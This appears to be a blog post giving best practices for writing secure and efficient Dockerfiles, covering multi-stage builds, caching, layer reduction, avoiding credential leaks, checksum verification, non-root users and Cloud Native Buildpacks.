Write secure and efficient Dockerfiles

This post covers some best practices for building secure and efficient docker images. This is not an exhaustive list, but covers most best practices for writing good enough secure & efficient Dockerfiles.

Multi-stage builds

Multi-stage builds allow you to drastically reduce the size of your final image, without struggling to reduce the number of intermediate layers and files.

Here an example of building a spring-boot maven project:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
FROM openjdk:8-jdk-alpine as build

WORKDIR /workspace/app

COPY mvnw .
COPY .mvn .mvn
COPY pom.xml .
COPY src src

RUN ./mvnw install
# ----------------------
FROM openjdk:8-jdk-alpine

RUN addgroup -S app && adduser -S app -G app
USER app:app

COPY --from=build  /workspace/app/target/hello-world.jar /

ENTRYPOINT ["java","-jar","/hello-world.jar"]

This example first build the maven project and only copies the needed files to the final docker image.

Leverage build cache

When building an image, Docker steps through the instructions in your Dockerfile, executing each in the order specified. As each instruction is examined, Docker looks for an existing image in its cache that it can reuse, rather than creating a new (duplicate) image.

So be sure to have the instructions that change the most at the bottom of the Dockerfile:

Do not do this:

1
2
3
COPY target/hello-world.jar .
# apk update will always trigger if the previous jar has been modified
RUN apk update

Do this instead:

1
2
RUN apk update
COPY target/hello-world.jar .

Reduce the number of layers

Try if you reduce the number of layers in your image by minimizing the number of separate RUN commands in your Dockerfile by consolidating multiple commands into a single RUN line.

So instead of:

1
2
RUN apk update
RUN apk install curl

Do:

1
2
RUN apk update && \
    apk add curl

Use COPY instead of ADD

Although ADD and COPY are functionally similar, generally speaking, COPY is preferred. That’s because it’s more transparent than ADD as the latter can point to a remote URL like http://evilsource.com that is fetched at build time, whereas COPY use local files, in other words resources you have control and checked.

Avoid COPY all current folder files

Even if it’s convenient, try to avoid doing this:

1
COPY . .

Instead, try to copy one file / folders at a time:

1
2
3
4
COPY mvnw .
COPY .mvn .mvn
COPY pom.xml .
COPY src src

The problem of copying the whole current folder is that developers may have put credentials in the folder, like some .credentials for development purpose, which are then available in the Docker image. And even if you delete the folder in the next Docker instruction, there are tools like dive that can check each layer of the Docker image.

Verify binary checksum when possible

If you need to download a binary, be sure to verify the checksum if provided to ensure the file is not corrupted during download or modified by a malicious third-party:

1
2
3
4
5
6
# using dive as example
RUN curl -L -o dive_0.9.2_linux_amd64.deb https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.deb &&
curl -L -o checksums.txt https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_checksums.txt &&
echo "$(cat checksums.txt|grep deb|awk '{ print $1 }') dive_0.9.2_linux_amd64.deb" | sha256sum -c
# this will display "dive_0.9.2_linux_amd64.deb: OK" and returns 0 if it's alright
# otherwise it will print "sha256sum: standard input: no properly formatted SHA256 checksum lines found" and returns 1, thus stopping the docker build

Do not upgrade your system packages

This might be a bit of a stretch but the reasoning is the following: you want to pin the version of your software dependencies, if you do apt-get upgrade you will effectively upgrade them all to the latest version.

If you do upgrade and you are using the latest tag for the base image, you amplify the unpredictability of your dependencies tree.

What you want to do is to pin the base image version and just apt/apk update.

Use non-root user

Root in a container is the same root as on the host machine, but restricted by the docker daemon configuration. No matter the limitations, if an actor breaks out of the container he will still be able to find a way to get full access to the host.

Create a user instead:

1
2
RUN addgroup -S bios && adduser -S bios -G bios
USER bios:bios

Here’s one example on why it matter to have a non-root user even if the container is isolated.

Use Cloud Native Buildpacks

Buildpacks transform your application source code to images that can run on any cloud. Paketo Buildpacks provide language runtime support for applications. They leverage the Cloud Native Buildpacks framework to make image builds easy, performant, and secure.

See https://paketo.io/.

If you are using Spring Boot 2.3+, you can use its plugin to build the image with Maven or Gradle:

1
2
3
4
# with Maven
./mvnw spring-boot:build-image
# with Gradle
./gradlew bootBuildImage

It uses the local docker daemon (which therefore must be installed) but doesn’t require a Dockerfile.

The image is built using Cloud Native Buildpacks, where the default builder is optimized for a Spring Boot application (you can customize it but the defaults are useful). The image is layered efficiently, like in the examples above. It also uses the CF memory calculator to size the JVM at runtime based on the container resources available.

Resources